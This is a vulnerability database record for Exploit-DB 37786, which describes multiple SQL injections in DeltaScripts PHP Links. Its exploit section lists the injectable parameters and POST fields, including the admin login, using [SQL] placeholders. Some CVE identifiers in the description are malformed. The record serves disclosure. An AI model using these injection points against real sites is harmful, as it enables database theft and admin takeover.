Details of VAR-E-200801-0039

ID

VAR-E-200801-0039

CVE

cve_id:	CVE-2008-0565	Trust: 1.9
cve_id:	CVE-2008-6720	Trust: 1.3

sources: BID: 32163 // BID: 27530 // EXPLOIT-DB: 37786 // EDBNET: 58955

EDB ID

37786

TITLE

DELTAScripts PHP Links - Multiple SQL Injections - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 37786

DESCRIPTION

DELTAScripts PHP Links - Multiple SQL Injections. CVE-2008-6720CVE-2008-0565CVE-53672CVE-41145CVE-126494CVE-126493CVE-126492CVE-126491CVE-126490 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 37786

AFFECTED PRODUCTS

vendor:	deltascripts	model:	php links	scope:	-	version:	-	Trust: 1.0
vendor:	deltascripts	model:	php links	scope:	eq	version:	1.3	Trust: 0.6

sources: BID: 32163 // BID: 27530 // EXPLOIT-DB: 37786

EXPLOIT

source: https://www.securityfocus.com/bid/55478/info

DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected.

http://www.example.com/phplinks/index.php?catid=[SQL]

http://www.example.com/phplinks/review.php?id=[SQL]

http://www.example.com/phplinks/search.php?search=[SQL]

http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL]

http://www.example.com/phplinks/vote.php

In POST method :

id=[SQL]&rating=

http://www.example.com/phplinks/admin/adm_login.php

In POST method :

admin_password=test&admin_username=[SQL]&submit=Login

http://www.example.com/phplinks/login.php

In POST method :

email=[SQL]&forgotten=&password=[SQL]&submit=Login

Trust: 1.0

sources: EXPLOIT-DB: 37786

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 37786

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 37786

TYPE

Multiple SQL Injections

Trust: 1.0

sources: EXPLOIT-DB: 37786

CREDITS

L0n3ly-H34rT

Trust: 0.6

sources: EXPLOIT-DB: 37786

EXTERNAL IDS

db:	NVD	id:	CVE-2008-0565	Trust: 1.9
db:	EXPLOIT-DB	id:	37786	Trust: 1.9
db:	BID	id:	55478	Trust: 1.9
db:	NVD	id:	CVE-2008-6720	Trust: 1.3
db:	EDBNET	id:	58955	Trust: 0.6
db:	BID	id:	32163	Trust: 0.3
db:	BID	id:	27530	Trust: 0.3

sources: BID: 32163 // BID: 27530 // BID: 55478 // EXPLOIT-DB: 37786 // EDBNET: 58955

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2008-0565	Trust: 1.6
url:	https://nvd.nist.gov/vuln/detail/cve-2008-6720	Trust: 1.0
url:	https://www.securityfocus.com/bid/55478/info	Trust: 1.0
url:	http://www.deltascripts.com/phplinks	Trust: 0.9
url:	https://www.exploit-db.com/exploits/37786/	Trust: 0.6
url:	https://www.exploit-db.com/exploits/37786	Trust: 0.3

sources: BID: 32163 // BID: 27530 // BID: 55478 // EXPLOIT-DB: 37786 // EDBNET: 58955

SOURCES

db:	BID	id:	32163
db:	BID	id:	27530
db:	BID	id:	55478
db:	EXPLOIT-DB	id:	37786
db:	EDBNET	id:	58955

LAST UPDATE DATE

2022-07-27T09:20:15.381000+00:00

SOURCES UPDATE DATE

db:	BID	id:	32163	date:	2015-04-16T17:51:00
db:	BID	id:	27530	date:	2015-05-07T17:33:00
db:	BID	id:	55478	date:	2012-09-10T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	32163	date:	2008-11-06T00:00:00
db:	BID	id:	27530	date:	2008-01-30T00:00:00
db:	BID	id:	55478	date:	2012-09-10T00:00:00
db:	EXPLOIT-DB	id:	37786	date:	2012-09-10T00:00:00
db:	EDBNET	id:	58955	date:	2012-09-10T00:00:00